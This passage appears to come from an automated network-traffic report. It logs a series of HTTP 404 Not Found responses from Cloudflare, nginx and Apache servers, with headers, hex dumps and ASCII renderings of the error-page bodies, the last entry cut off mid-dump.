                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:50:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KCCU1hvuO5Ucax93Js2%2BHfNo578ShphpbdSlojgMcS04yQHd1VEkvptP3ECS6DahU4csB6chnMc%2B4i2IHv1jUgxbvfbBqAW5s%2BF8WjoCLRYfzDuZ%2BdM1b6zsXgrP4rCw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb94e8a9697295-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1975&rtt_var=987&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:50:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8V36aZKAN2KR4wBamopm6YlmOYJJNGiOg%2FhDWSx8yVpMW7fy9lTW9TQExCaHKs%2BZtmeloqKo%2FDGb8C2HaUGvmxn2wYSPmMcVaTSnFiwdn%2Fs%2B8NJUz4S6uYwBwdNWAl8G"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb94f97c84425d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10844&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=29QN4nssBjCi6ei6AYTKUd9by5RPCIaRp650AkRc09SPPCdP%2B%2B9RD6n9kFzVAl4UHT2ApV6NLP6Edtp47RiQWwrTAtFVp7pg32xKHRXgeLLgQDnjMvCqyQeFVSX94dg8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb950afb5d42bd-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1595&rtt_var=797&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=480&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sb1ErnMjzzR29hM0XBL129253GiHieYqwYrcSLfMlQbhuEYk9aHS8Rux2WlucpIHKgNqTCSaX3Euhy%2B5PZ0drXjRIg1M%2BiyIh08thSIdBCS7fN7gJ1YZ15tIUD2Sw2xQsyErS6uw2FA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb95378883f78d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1655&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=52&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b98QT9qej0L73OyLkjIj%2BijXP5uy5AyhEKTwjwsFG2RvBgsEleE%2B7pA1YMFD9ubpPJPcXkADTu9pnELn1aBhIVZppwMcrpzt1pXyVqPY3Nmxt33HTdSWmR6fRUgaDxMXsvFMVQDDyNc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb95483e1142eb-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2034&rtt_var=1017&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lUhPpNUjioXyUD7OJfPsS5NFvdnMVvDaBEK52pBvXGxf6NzvBp%2Feb%2B4SEWwKiEoJy9l%2BMb53ife7EbIYSOOVl43zEAzsEhnhuLcNQBFwauTDJozz8UOmx5zZYkl0Ok9Omi7dXTWFjq0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb9558aefe5e64-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2789&min_rtt=2789&rtt_var=1394&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10868&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHce4l%2BPo4yJN2jVNLNVpoyuOZjBNgQXHw8gRGojleO7rzKLhaz9tMObW%2FEZ8njt%2FSaT6Tluoh92DKpjLDUEs6Ut810D9okf7Iqu9j4lKnPD%2BCHdIvFsfvNKbYS3xpa7Rlt5t1YfrKY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb95695f0243f1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1675&rtt_var=837&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>10
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:39 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:52:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H5P8%2Bt%2FBRk98M2pup3d%2BCsjvYqYTE%2BjDjrlCM2SvkzoaX1tHSMmDiEEV4hAfma9Ll3M3hMVMr5sk0rTE6f4t9fg19QV8BptutSmr0aFOUD1U7ojuw3j%2B6wIsKGAahLH%2B%2BFPAdHCJyq5pnLUU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb96a06fc80f46-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1700&rtt_var=850&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 3a ef a6 f3 Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:52:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bz%2Fr7hIiGMqs1GErY73nJpl5Lf88jiKZHOv3R7MUmwkKHxxHhzT3C5Ax1jqxO%2Bq8zU1btX5HyqRE1%2FfDonpUQOXH7qq3Xn3CytqtYooCbkjjvndM1jrEhJZMPDnATpyD9Ui9FWlTM9P6bejJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb96b11bb842a0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1738&rtt_var=869&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 